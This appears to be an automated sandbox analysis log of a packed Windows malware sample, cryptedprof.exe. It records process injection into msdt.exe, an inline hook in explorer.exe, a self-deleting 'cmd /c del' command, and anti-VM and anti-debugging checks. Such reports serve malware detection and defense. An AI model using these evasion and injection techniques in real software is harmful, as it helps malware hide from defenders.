          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_6FC2421B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_01
          Source: C:\Users\user\Desktop\cryptedprof.exeFile created: C:\Users\user\AppData\Local\Temp\nsv1C7.tmpJump to behavior
          Source: cryptedprof.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\cryptedprof.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: cryptedprof.exeReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\cryptedprof.exeFile read: C:\Users\user\Desktop\cryptedprof.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess created: C:\Users\user\Desktop\cryptedprof.exe 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\cryptedprof.exe'
          Source: C:\Users\user\Desktop\cryptedprof.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: cryptedprof.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: cryptedprof.exe, 00000001.00000003.334189202.0000000002C50000.00000004.00000001.sdmp, cryptedprof.exe, 00000003.00000002.388641562.0000000000BAF000.00000040.00000001.sdmp, msdt.exe, 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cryptedprof.exe, msdt.exe
          Source: Binary string: msdt.pdb source: cryptedprof.exe, 00000003.00000002.389071974.0000000002830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.354086786.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\cryptedprof.exeUnpacked PE file: 3.2.cryptedprof.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: 8chdn.dll.1.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70992F60 push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00416A63 push esp; retf
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00416AF0 pushfd ; iretd
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00416AA8 push esp; retf
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00417B8F push ebp; ret
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_004173B1 push edx; retf
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_004135D2 push cs; ret
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B0D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C76AF0 pushfd ; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C76AA8 push esp; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C76A63 push esp; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C77B8F push ebp; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C773B1 push edx; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CF6C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CF02 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C7CF0B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02C735D2 push cs; ret
          Source: initial sampleStatic PE information: section name: .data entropy: 7.23183783874
          Source: C:\Users\user\Desktop\cryptedprof.exeFile created: C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\cryptedprof.exeFile created: C:\Users\user\AppData\Local\Temp\8chdn.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\cryptedprof.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002C698E4 second address: 0000000002C698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000002C69B5E second address: 0000000002C69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4928Thread sleep time: -58000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004065C1 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_004027A1 FindFirstFileA,
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000002.601400852.000000000461E000.00000004.00000001.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60200-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&%
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345049804.000000000461E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.349105982.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.351832152.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000005.00000000.349105982.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.351603974.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.351918653.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.338525692.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.346745168.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_70991A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_6FC24582 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 1_2_6FC24785 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B84015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B72073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B81074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B74AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
